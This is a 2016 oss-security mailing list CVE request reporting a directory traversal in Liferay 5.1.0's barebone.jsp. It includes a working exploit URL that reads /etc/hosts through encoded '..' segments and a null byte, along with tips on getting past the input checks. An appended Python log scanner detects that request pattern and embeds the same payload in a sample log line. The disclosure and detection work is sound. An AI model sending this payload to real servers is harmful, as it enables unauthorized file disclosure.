Date: Mon, 1 Aug 2016 18:38:09 +0200
From: "petrella.pietro" <petrella.pietro@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE:Request - Path Traversal Barebone.jsp - Liferay 5.1.0


I discovered a directory traversal issue on the minifierBundleDir
variable of barebone.jsp on a website with Liferay 5.1.0. I don't
exclude that this vulnerability is present in other Liferay versions as
well.

However, I report the following vulnerable URL as an example:

https://mysite.it/html/js/barebone.jsp?browserId=firefox&themeId=sometheme&colorSchemeId=01&minifierType=js&minifierBundleId=javascript.barebone.files&minifierBundleDir=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E%2Fetc%2Fhosts%00.html&t=1429132297000

It's important to note that the requested URL is built in the following
manner:
- only ".." encoded characters are permitted when you insert the
traversal request
- at the end of the file it is necessary to insert %00 and .html,
otherwise the request is not accepted

So, to navigate the filesystem it is recommended to use the Burp Suite
"repeater tab" tool.

If there is no CVE for this finding, for this purpose I require a CVE,
please.

Thank you
Pietro

-- -- -- -- --
Pietro Petrella
Information Security Consultant
(CISSP, OPST, RHCE, ISO 27001:2013)
PGP: 5017 E6A8 9E1E 5B39 8C52 05C7 81A5 C3C9 8ED5 4730
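
A log check for the request shape described in the message above, added here as an example (it is not part of the original message and not Liferay code): it flags barebone.jsp requests whose decoded minifierBundleDir value contains a ".." path segment or a NUL byte. The access-log format, the sample lines and the benign parameter value are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "minifierBundleDir"  # parameter named in the report
# Request line as it appears in common/combined access-log format (assumed format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def findings_for(target):
    """Return the reasons the PARAM value in one request target looks like the reported traversal."""
    reasons = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name != PARAM:
            continue
        # parse_qsl has already percent-decoded: %2E%2E -> "..", %2F -> "/", %00 -> NUL
        if ".." in re.split(r"[/\\]", value):
            reasons.append("dot-dot path segment")
        if "\x00" in value:
            reasons.append("NUL byte before suffix")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for each log line with a suspicious barebone.jsp request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m or "barebone.jsp" not in m.group(1):
            continue
        reasons = findings_for(m.group(1))
        if reasons:
            hits.append((n, reasons))
    return hits

# Constructed sample log lines (documentation IP addresses, made-up timestamps and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2016:18:01:02 +0200] "GET /html/js/barebone.jsp?minifierType=js&minifierBundleDir=%2Fhtml%2Fjs&t=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Aug/2016:18:03:17 +0200] "GET /html/js/barebone.jsp?minifierType=js&minifierBundleDir=/%2E%2E/%2E%2E%2Fetc%2Fhosts%00.html&t=1 HTTP/1.1" 200 311',
    '192.0.2.10 - - [01/Aug/2016:18:04:40 +0200] "GET /html/css/main.css HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(reasons)}")
```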